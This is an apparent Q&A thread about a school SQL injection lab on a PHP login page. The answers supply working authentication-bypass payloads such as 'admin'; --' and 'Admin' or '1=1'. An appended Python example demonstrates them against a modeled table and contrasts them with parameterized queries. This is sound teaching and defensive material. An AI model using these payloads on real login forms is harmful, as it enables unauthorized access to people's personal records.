
I am new to MySQL, and I have a school task that says this:

The SQL Injection Task

This is the PHP code that shows how users are authenticated:

$input_uname = $_GET['username'];
$input_pwd = $_GET['Password'];
$hashed_pwd = sha1($input_pwd);
...
// both user-supplied values are concatenated straight into the SQL text
$sql = "SELECT id, name, eid, salary, birth, ssn, address, email,
nickname, Password
FROM credential
WHERE name= '$input_uname' and Password='$hashed_pwd'";
$result = $conn -> query($sql);
// The following is Pseudo Code
if(id != NULL) {
    if(name=='admin') {
        return All employees information;
    } else if (name !=NULL){
        return employee information;
    }
} else {
    Authentication Fails;
}

I have tried so many different things like this:

SELECT * FROM credential WHERE name= 'admin';

SELECT * FROM credential WHERE name= 'admin' and Password= 'xyz';

I put this statement in the username box and xyz in the password box. I am not sure if I am even approaching this correctly. The SQL statement should go in the username box, correct? Is the Password box left empty? My professor hasn't covered this in class. Can someone please clarify how this is done? I have seen examples online and they all look somewhat similar to the above. But I get the same error every single time:

`There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin' and password= "xyz"; and Password= da39a3ee5e6b40d3255bfe95601890afd80 at line 3]`

Thank you all in advance!

  • Hacking and teaching people to hack (even so-called ethical hacking) is not something this website supports – Hogan Feb 28 '19 at 23:28
  • I'm voting to close this question as off-topic because it is asking how to hack – Hogan Feb 28 '19 at 23:29
  • It's for a school assignment though –  Feb 28 '19 at 23:29
  • I don't care, I don't think we should teach how to hack on this website – Hogan Feb 28 '19 at 23:31
  • What's 8 characters? –  Feb 28 '19 at 23:32
  • The solution to this problem is 8 characters – Hogan Feb 28 '19 at 23:34
  • You can't actually hack anything important like this. This is elementary hacking lol –  Feb 28 '19 at 23:35
  • Possible duplicate of [How can I prevent SQL injection in PHP?](https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – GMB Feb 28 '19 at 23:35
  • Why do you think you can't hack anything like this? There are countless websites vulnerable to this type of hack on the web right now. – Hogan Feb 28 '19 at 23:36
  • I agree with @Hogan, if you want to learn for a school assignment, then ask your teacher. Please understand that we don't have any way of confirming that you're really a student. "I'm doing it for school" is just what a wannabe black-hat hacker would say. – Bill Karwin Mar 01 '19 at 03:32

2 Answers


I don't agree that the question is meant to teach people how to hack. It is meant to teach backend developers to sanitize input in order to avoid SQL injection or other types of attacks.

To answer your question, you can leave the password field empty and just use the user name.

You can see in the server code that no check is made on the input: it is taken as is and put into the SQL statement. So in order to make the SQL statement do what you are looking for, the field can have the following value:

admin'; --

The hyphens start a SQL comment that disables the last part of the SELECT statement, so you do not have to provide the password. The quote and the ; close the statement. Result: you'll log in as admin ;-)

Hichem BOUSSETTA
  • note, if you leave off the `;` and space this is only 8 characters :D – Hogan Feb 28 '19 at 23:49
  • I stated prior the solution was 8 characters and then deleted that comment. This is why it makes no sense. – Hogan Mar 01 '19 at 15:03

Turns out this is what worked for me:

Admin' or '1=1

I'm not completely sure why this also works but it does:

Admin' or '
  • yes, in general, a true condition is added in case we don't know the user name. But here you don't need to as you know the admin user name. Regarding the second writing, I think it will generate an error in the sql query, but maybe a part of the query is still executed. Not guaranteed 100% to work – Hichem BOUSSETTA Mar 01 '19 at 07:51
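To make the mechanics of both answers visible, here is an added example that is not part of the question, the answers or the lab code: it rebuilds the page's query exactly as the PHP concatenates it, runs the three payloads from the two answers plus the question's own attempt against it, and then runs the same inputs through a parameterized version of the query. It uses Python with an in-memory SQLite database instead of PHP and MySQL; the `credential` rows and passwords are constructed, and `COLLATE NOCASE` on the name column is an assumption standing in for MySQL's default case-insensitive string comparison (which is why the capitalised `Admin` payloads match the `admin` row on the lab server). String literals and `-- ` comments behave the same in both engines.

```python
"""Model of the lab's login query, run against in-memory SQLite instead of MySQL.
Added example (not from the question or answers); table contents are constructed."""
import hashlib
import sqlite3

# Constructed stand-in for the lab's `credential` table. COLLATE NOCASE mirrors
# MySQL's default case-insensitive string comparison (assumption), which is why
# the 'Admin' payloads from the second answer still match the 'admin' row.
SCHEMA = """
CREATE TABLE credential (
    id INTEGER PRIMARY KEY, name TEXT COLLATE NOCASE, eid TEXT, salary INTEGER,
    birth TEXT, ssn TEXT, address TEXT, email TEXT, nickname TEXT, Password TEXT
);
"""
ROWS = [  # (id, name, eid, salary, birth, ssn, address, email, nickname, sha1(password))
    (1, "admin", "90001", 100000, "1/1/1980", "111111111", "", "", "",
     hashlib.sha1(b"adminpw").hexdigest()),
    (2, "alice", "10001", 40000, "2/2/1990", "222222222", "", "", "",
     hashlib.sha1(b"alicepw").hexdigest()),
]


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO credential VALUES (?,?,?,?,?,?,?,?,?,?)", ROWS)
    return conn


def build_query(username, password):
    """What the page's PHP does: sha1 the password, then splice both raw
    strings into the SQL text. The username is never quoted or escaped."""
    hashed = hashlib.sha1(password.encode()).hexdigest()
    return (
        "SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password "
        "FROM credential "
        f"WHERE name= '{username}' and Password='{hashed}'"
    )


def vulnerable_login(conn, username, password):
    """Names of the rows the spliced query returns, or None when no row matches
    or the injected text produces a syntax error (the error the question quotes)."""
    try:
        rows = conn.execute(build_query(username, password)).fetchall()
    except sqlite3.Error:
        return None
    return [row[1] for row in rows] or None


def safe_login(conn, username, password):
    """Hardened form: the values travel as bound parameters, never as SQL text,
    so a quote or comment marker in the username is just data to compare."""
    hashed = hashlib.sha1(password.encode()).hexdigest()
    rows = conn.execute(
        "SELECT id, name FROM credential WHERE name = ? AND Password = ?",
        (username, hashed),
    ).fetchall()
    return [row[1] for row in rows] or None


PAYLOADS = [
    "admin'; --",      # first answer: close the literal, comment out the password check
    "Admin' or '1=1",  # second answer: name='Admin' OR ('1=1' AND Password=...) is true for admin
    "Admin' or '",     # second answer, shorter: name='Admin' OR ('' AND Password=...)
    "SELECT * FROM credential WHERE name= 'admin' and Password= 'xyz';",  # the question's attempt
]

if __name__ == "__main__":
    conn = connect()
    for username in PAYLOADS:
        print(build_query(username, ""))
        print("  vulnerable ->", vulnerable_login(conn, username, ""))
        print("  prepared   ->", safe_login(conn, username, ""))
```

Printing the spliced SQL shows why each input behaves as it does: `admin'; --` closes the name literal and comments out `and Password=...`; the two `or` variants leave the password comparison in place but attach it with `and` to a stray literal, so the whole clause reduces to `name='Admin' OR false`; the question's full SELECT ends up inside the string literal, leaving a bare `admin` token that is a syntax error, which is the message the question quotes. With bound parameters none of the four inputs matches a row. The mysqli equivalent of `safe_login` is `$conn->prepare("SELECT id, name FROM credential WHERE name = ? AND Password = ?")` followed by `bind_param('ss', $input_uname, $hashed_pwd)` and `execute()`.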